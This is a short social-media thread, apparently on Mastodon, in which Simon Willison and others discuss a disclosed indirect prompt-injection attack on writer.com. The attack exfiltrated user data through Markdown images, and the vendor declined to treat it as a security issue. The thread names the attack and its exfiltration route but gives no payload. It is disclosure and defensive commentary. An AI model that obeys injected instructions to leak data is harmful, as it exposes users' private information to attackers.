simon,
@simon@simonwillison.net avatar

Nasty example here of a prompt injection data exfiltration attack against writer.com - made much worse by Writer's response to the responsible disclosure of the vulnerability that "We do not consider this to be a security issue since the real customer accounts do not have access to any website."

https://promptarmor.substack.com/p/data-exfiltration-from-writercom

I wrote more notes on this here: https://simonwillison.net/2023/Dec/15/writercom-indirect-prompt-injection/

bocytko,

@simon ... how does one screen vendors to filter out companies that don't have the right mindset?

simon,
@simon@simonwillison.net avatar

@bocytko With LLM stuff it's particularly difficult because some of the attack vectors are so poorly understood, and in the case of prompt injection don't actually have reliable fixes

I'd start by asking my vendor to explain prompt injection and then explain what design measures they have taken to counter it's potential impact - my hunch is that Writer.com would NOT have answered that question at all well

Caroline,

@simon @bocytko Nobody will have answers to prompt injection attacks, I bet. As is stated in that article: It's a "won't fix"

simon,
@simon@simonwillison.net avatar

@Caroline @bocytko They should still fix the Markdown image exfiltration vector - that would go a long way to making this harder to effectively exploit

  • All
  • Subscribed
  • Moderated
  • Favorites
  • random
  • ethstaker
  • DreamBathrooms
  • mdbf
  • InstantRegret
  • ngwrru68w68
  • magazineikmin
  • everett
  • thenastyranch
  • Youngstown
  • slotface
  • cisconetworking
  • kavyap
  • osvaldo12
  • modclub
  • megavids
  • GTA5RPClips
  • khanakhh
  • tacticalgear
  • Durango
  • rosin
  • normalnudes
  • Leos
  • provamag3
  • tester
  • cubers
  • anitta
  • JUstTest
  • lostlight
  • All magazines
    •